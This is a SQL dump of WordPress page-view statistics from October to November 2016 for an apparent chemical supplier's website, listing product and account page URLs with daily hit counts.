INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ay/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 580); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-31', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-31', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-31', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-31', 3, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-10-31', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-31', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-31', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-31', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/', '2016-10-31', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-31', 3, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-31', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-31', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-217x/', '2016-10-31', 3, 1645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-217x/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1645); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-31', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-31', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-31', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-31', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-31', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-31', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-31', 1, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-31', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-143az/', '2016-10-31', 1, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-31', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-31', 2, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-31', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-31', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-31', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-31', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1113', '2016-10-31', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-11-01', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-143az/', '2016-11-01', 1, 452); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-11-01', 425, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-11-01', 1, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ay/', '2016-11-01', 1, 580); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-11-01', 128, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-11-01', 54, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-11-01', 46, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-11-01', 12, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-11-01', 40, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-11-01', 27, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-11-01', 78, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-11-01', 9, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-11-01', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-11-01', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-11-01', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-11-01', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-11-01', 13, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-11-01', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-11-01', 16, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-11-01', 9, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-11-01', 4, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/', '2016-11-01', 4, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-11-01', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-11-01', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-11-01', 8, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-11-01', 14, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-11-01', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-11-01', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-11-01', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-11-01', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-11-01', 7, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-11-01', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-11-01', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-11-01', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-11-01', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-11-01', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-11-01', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-11-01', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-11-01', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-11-01', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-11-01', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-11-01', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-11-01', 12, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-11-01', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-11-01', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-11-01', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-11-01', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-11-01', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-11-01', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-11-01', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-handpiece-lubricants/', '2016-11-01', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-handpiece-lubricants/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-11-01', 2, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-11-01', 5, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-11-01', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-11-01', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-11-01', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-11-01', 9, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-11-01', 12, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-11-01', 3, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-11-01', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-11-01', 1, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-11-01', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-11-01', 22, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-11-01', 11, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-11-01', 2, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-11-01', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-11-01', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-11-01', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-11-01', 8, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-11-01', 3, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-11-01', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-11-01', 7, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-01', 4, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-11-01', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-11-01', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-11-01', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-11-01', 18, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-11-01', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-11-01', 2, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-11-01', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-11-01', 2, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-11-01', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-11-01', 4, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-11-01', 2, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-11-01', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-11-01', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-11-01', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-11-01', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-11-01', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-11-01', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-11-01', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l-flux-remover/', '2016-11-01', 1, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-11-01', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-11-01', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-11-01', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-11-01', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-11-01', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-11-01', 2, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-11-01', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-11-01', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-11-01', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-11-01', 2, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/heloxy-61/', '2016-11-01', 1, 1073); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/', '2016-11-01', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-11-01', 3, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-11-01', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-11-01', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/', '2016-11-01', 2, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-11-01', 4, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-11-01', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-11-01', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-11-01', 3, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3055/', '2016-11-01', 1, 1168); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-11-01', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-11-01', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-11-01', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bd/', '2016-11-01', 1, 675); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-11-01', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-11-01', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-11-01', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-11-01', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/shutterstock_405633937/', '2016-11-01', 1, 2553); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-11-01', 8, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/?wc-ajax=get_refreshed_fragments', '2016-11-01', 8, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-11-01', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-11-01', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-11-01', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-11-01', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/?wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-11-01', 2, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/?wc-ajax=get_refreshed_fragments', '2016-11-01', 2, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?remove_from_wishlist_after_add_to_cart=1338', '2016-11-01', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?remove_from_wishlist_after_add_to_cart=1338&wc-ajax=get_refreshed_fragments', '2016-11-01', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-11-01', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-11-01', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-11-01', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-11-01', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-11-01', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/', '2016-11-01', 1, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-11-02', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-11-02', 376, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-11-02', 69, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-11-02', 5, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-02', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/high-temperature-release-agent/', '2016-11-02', 4, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/high-temperature-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-02', 3, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-11-02', 95, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283aa/', '2016-11-02', 1, 653); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-11-02', 3, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-11-02', 5, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-11-02', 2, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/?wc-ajax=get_refreshed_fragments', '2016-11-02', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-11-02', 35, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-11-02', 12, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-11-02', 19, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-11-02', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-11-02', 42, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-11-02', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-11-02', 12, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-11-02', 9, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-11-02', 3, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-11-02', 32, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-11-02', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-11-02', 4, 204); 
